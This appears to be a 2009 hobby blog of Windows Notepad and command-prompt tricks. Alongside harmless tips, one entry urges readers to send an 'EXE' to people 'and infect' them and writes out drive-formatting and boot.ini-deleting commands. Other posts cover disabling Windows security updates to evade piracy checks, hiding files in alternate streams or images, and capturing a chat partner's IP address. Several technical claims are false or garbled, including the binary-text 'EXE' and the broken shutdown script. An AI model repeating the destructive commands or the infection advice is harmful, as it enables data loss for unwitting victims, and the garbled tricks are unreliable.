Tuesday, November 10, 2009

What u can do with a help of notepad??

Trick 1 : To Know system time and date

just open a notepad

Now press "F5" and see the result.


Trick 2 : Make your keyboard a "live disco"

This code when executed makes your Caps, Num, Scroll lock keys flash. very attractive ...i have tried it..trust me!!

Instructions:
paste the code given below in notepad
Save as disco.vbs
Run the file

This piece of code makes your keyboard a live disco...

Code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

TO REMOVE LIVE DISCO ON KEYBOARD WITHOUT CHANGING CODE.
OPEN TASK MANAGER THEN IN PROCESSES END PROCESS WSCRIPT.EXE FILE.


Trick 3 : Appending the time and date to the end of the file

Open a blank Notepad file

* Write .LOG as the first line of the file, press enter.

* Save the file and close it.

* Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the line after.

* Type your notes and then save and close the file.

Each time you open the file, Notepad repeats the process, appending the time and date to the end of the file and placing the cursor below it.


Trick 4 : Format a HDD with notepad


Step 1. Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2. Save As An EXE Any Name Will Do

Step 3. Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code

format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X -- this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001


Trick 5 : Amazing Notepad Trick

This is amazing trick to hide simple txt file from other people, it's useful if you share one commuter with other people

1-open up command prompt window (start menu run type cmd)
2-choose with partion you want to save this file in my case i choosed C and then type c \
3-first we going to create a new notepad file so let's type notepad file1.txt
4- click save and write anything, this file is one it's gonna be visible to other
5-now we going to create the hidden file so we need to type notepad file1.txt:hidden.txt
6-click save and write anything that you don't want anyone to see it

Now here is the trick the file hidden.txt is not visible any where else you can't view or open this file from windows explorer

The only way you can open hidden.txt is by command prompt window

To open it type notepad file1.txt:hidden.txt

This is good way if you want to hide simple txt file from other people, no one can open hidden.txt except if someone know the name of hidden.txt and file1.txt


Trick 6 : Copy The Text From Message Box

Here i show you how to copy the text from the error message box easily and make the troubleshooting process easier or if you want to see the solution on net.

The full content of the error message can be copied into the clipboard.

Hit "Ctrl + C" (shortcut for ‘copy’),open your text editor (like notepad) and paste it out "Ctrl + V".


Trick 7 : shut down computer in 20 sec

run Notepad
and type tha following code:
cls/
shutdown-1
cls/
copycon**

save as .bat
then open it and ur pc will shutdown in 20 seconds.It does no harm ur pc.

It's easy to disable this shut down ....the timer will start ...press windows key+r come up run mrnu type this shutdown -i the shutdown timer is disable.....it's simple!

Monday, November 9, 2009

Problem with Full screen mode while watching Youtube?


So you have a problem watching videos on Youtube full screen, does it works fine when it is in regular mode? Yes!! Good. But the problem is when you try to watch it full screen you end up with a dividing line from bottom left hand side of ur screen upto the top right hand side almost like a " / " with the top left hand side all Grey and the bottom right hand side is White, but no video will play? Audio will play, but no dice with the video. Or video just stops!! Are these type of problems occuring? Do you ever tried updating the flash player?? Yes!! or No!!! or after installing a new one it still doesn't work. Is the operating system vista or Xp? Ok!! try this solution my friend...

Solution:
1. Right-click in the standard youtube video window (non-full screen).

2. Choose 'Settings' from the Flash Player's pop-up menu.

3. Uncheck the 'Enable Hardware Acceleration'
4. Click 'Close'.

Other Solutions!!!

1. Did you already download the latest Adobe Flash Player? If not then install a new Flash Player 10.0.32.18 (for IE). You can download from here.Flash Player 10.0.32.18 (for IE)

Perhaps it will work better for you. I have no problems going to full screen mode with YouTube videos using it.

2. You might check your Internet Explorer (If you are using IE) security level settings and make sure for "Internet" you have it set to the "Default level (Medium-High)". When I bumped it up to "High", I had problems with the videos to. (Tools -> Internet Options -> Security tab). Hope this helps you track the problem.

3. Take help from this video on YouTube:Watch Here

Some DOS tips, tricks and tweaks!!

Tip 1 :Disable Autoupdate

If you using Unregistered Windows. the auto update will be a big Problem to your system.

When you used the internet on your PC the auto update will connect the Microsoft and your system and show some error message like "'You are the victim of Software Piracy'"

So how can you easily remove Automatic Update and Security Center

Goto Start - > Run and type msconfig

In 'System Configuration Utility' window go to "Services" tab

Uncheck "Automatic Update" and "Security Centre" and Apply "OK" and Restart

That's all Enjoy!!!


Tip 2 : Filling Screen with rapidly moving text

1: Open up their Command Prompt.

2: Enter full screen (Alt + Enter)

3: Type "cd.." (without quotes), hit Return key, then repeat once again.

4: Type in either "color 2" or "color 9f" (without quotes) and hit Return. Color 2 turns the text green matrix-y style, and color 9f will give you white text on a blue background, BSOD style.

5: Finally type "dir /s" (without quotes) and hit enter. Suddenly the screen will begin to fill with rapidly moving text!

It is not possible to stop this once it has begun except by typing the key command "Ctrl + C" (without quotes).

This IS NOT hacking, just a cool trick to play on a friend when they are absent from a computer!

Hope this works for you all, it sounds like a lot to do if your under the pressure of a friend returning, but with a little practice this can be pulled off in ten to fifteen seconds!

Sunday, November 8, 2009

Hide a RAR file in a JPG file

First you need to have a .rar file and a .jpg image to hide the rar. Let us suppose the jpg is “image.jpg” and the rar is “file.rar”.

Go to Windows command prompt (Start>Run>type cmd and press enter)

Now type this command: copy /b image.jpg + file.rar newfile.jpg

switch “/b” indicates the copy function is binary.
“newfile.jpg” is the resulting image with the rar file embedded (you can use a name of your choice)

That’s all!!

When you click on newfile.jpg the image will be displayed. Now if you change the jpg extension to rar (ie: newfile.rar) and open it with WinRAR the contents of the embedded rar file will be displayed.

The jpg can be replaced with a bmp,png,gif or swf file. The rar archive can be replaced with zip,tar.gz/bz2 or 7z archive. Actually in theory you can use any image format and any archive.

Here are some sample commands:

copy /b image.bmp + file.zip newfile.jpg
copy /b image.gif + file.7z newfile.jpg
copy /b image.png + file.tar.gz newfile.jpg
copy /b image.swf + file.rar newfile.jpg

Saturday, November 7, 2009

Play tricks with your friends while chatting!!

Hi friends...I know that many of you know what an IP address is. Ok! I will go directly into what i posted this topic for. This is just to show you how well u can play tricks with ur friends with whom u r chatting. Now consider that u r chatting with a friend in yahoo messenger.

U can find out his IP address if u can make him accept any file from u.

Yes that's true. It is just a single word that does all the work. Now first what u have to do is, just keep speaking with ur friend. Then be ready with the command prompt open. Then when the command prompt is ready, send a file to ur friend.

NOTE: File can be with any extension, any length!!

When ur friend starts downloading ur file, a peer-to-peer connection starts off. So now immediately when he starts downloading, u must type "netstat" in the command prompt and press enter button. By this process you can find your friend's IP address.

Wait wait...do not be in a hurry. This command will give u nearly 5-6 addresses in a table format. So ur friend's address is the foreign address. You can search for "Foreign IP address" in that table.

And... tease ur friends by saying I have ur IP address now...

ha ha ha enjoy...

Have a great day!!

NOTE: The misuse of IP addresses is an illegal activity. So try at your own risks.